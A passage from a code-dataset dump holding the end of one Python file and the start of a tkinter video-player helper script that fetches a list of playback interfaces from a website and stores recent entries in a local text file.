pmtZ[pmt]))\nprint('}')\n","repo_name":"drinkingkazu/OpT0Finder","sub_path":"bin/dump_geotree.py","file_name":"dump_geotree.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"33888419024","text":"__author__ = 'PythonStriker'\n\nimport requests\nimport webbrowser\nimport re\nimport tkinter as tk\nfrom tkinter import ttk\nimport os\n\ndata = [\"播放接口1\",\"播放接口2\",\\\n \"播放接口3\",\"播放接口4\",\\\n \"播放接口5\"]\n\nurl = 'http://www.qmaile.com/'\n\ndef read():\n if os.path.exists('data.txt'):\n with open('data.txt', encoding='utf-8', mode='r') as file:\n if os.path.getsize('data.txt')==0:\n readlist = ['', '']\n else:\n lines = file.readlines()\n last_line = lines[-1]\n readlist = last_line.split(' ')\n else:\n file = open('data.txt',encoding='utf-8',mode='a')\n file.close()\n readlist = ['', '']\n return readlist\n\nresponed = requests.get(url)\nreg = re.compile('